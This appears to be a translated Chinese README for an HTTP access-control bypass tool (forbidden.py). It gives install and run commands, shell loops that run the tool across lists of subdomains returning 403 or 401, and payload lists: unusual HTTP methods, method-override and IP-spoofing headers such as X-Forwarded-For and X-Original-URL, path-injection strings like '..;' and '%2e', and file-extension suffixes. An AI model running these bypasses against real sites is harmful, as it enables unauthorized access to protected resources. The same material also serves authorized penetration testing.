|
目录
从 /src/ 打开您首选的控制台并运行如下所示的命令。 安装所需工具: apt-get install -y curl 安装所需的软件包: pip3 install -r requirements.txt 运行脚本: python3 forbidden.py 请注意速率限制。在为同一域再次运行脚本之前给它一些时间以获得更好的结果。 某些网站需要用户代理标头。从这里下载用户代理列表。 自动化 绕过 403 Forbidden HTTP 响应状态码: count=0; for subdomain in $(cat subdomains_403.txt); do count=$((count+1)); echo "#${count} | ${subdomain}"; python3 forbidden.py -u "${subdomain}" -t method,method-override,header,path,scheme-override -f GET -o "forbidden_403_results_${count}.json"; done 绕过 401 Unauthorized HTTP 响应状态码: count=0; for subdomain in $(cat subdomains_401.txt); do count=$((count+1)); echo "#${count} | ${subdomain}"; python3 forbidden.py -u "${subdomain}" -t auth -f GET -o "forbidden_401_results_${count}.json"; done 损坏的 URL 解析器检查: count=0; for subdomain in $(cat subdomains_live_long.txt); do count=$((count+1)); echo "#${count} | ${subdomain}"; python3 forbidden.py -u "${subdomain}" -t parser -f GET -o "forbidden_parser_results_${count}.json"; done HTTP 方法 ACL ARBITRARY BASELINE-CONTROL BIND CHECKIN CHECKOUT CONNECT COPY DELETE GET HEAD INDEX LABEL LINK LOCK MERGE MKACTIVITY MKCALENDAR MKCOL MKREDIRECTREF MKWORKSPACE MOVE OPTIONS ORDERPATCH PATCH POST PRI PROPFIND PROPPATCH PUT REBIND REPORT SEARCH SHOWMETHOD SPACEJUMP TEXTSEARCH TRACE TRACK UNBIND UNCHECKOUT UNLINK UNLOCK UPDATE UPDATEREDIRECTREF VERSION-CONTROL HTTP 标头 方法覆盖 HTTP 标头: X-HTTP-Method X-HTTP-Method-Override X-Method-Override HTTP 标头: Client-IP Cluster-Client-IP Connection Contact Forwarded Forwarded-For Forwarded-For-Ip From Host Origin Referer Stuff True-Client-IP X-Client-IP X-Custom-IP-Authorization X-Forward X-Forwarded X-Forwarded -By X-Forwarded-For X-Forwarded-For-Original X-Forwarded-Host X-Forwarded-Server X-Forward-For X-Forwared-Host X-Host X-HTTP-Host-Override X-Original-URL X -Originating-IP X-Override-URL X-ProxyUser-IP X-Real-IP X-Remote-Addr X-Remote-IP X-Rewrite-URL X-Wap-Profile X-Server-IP X-Target 方案覆盖 HTTP 标头: X-Forwarded-Proto X-Forwarded-Protocol X-Forwarded-Scheme X-Url-Scheme X-URLSCHEME 网址路径 在URL路径的前后注入;有和没有前置和附加斜杠。 / // %09 %20 %2e . .. ; .; ..; ;foo=bar; 在 URL 路径的后面注入。 ~ ~~ ~~random * ** **random # ## ##random ? ?? ??random 仅当 URL 路径不以“/”结尾时才在 URL 路径后面注入。 .php .jsp .jspa .jspx .jhtml .html .sht .shtml .xhtml .asp .aspx .esp |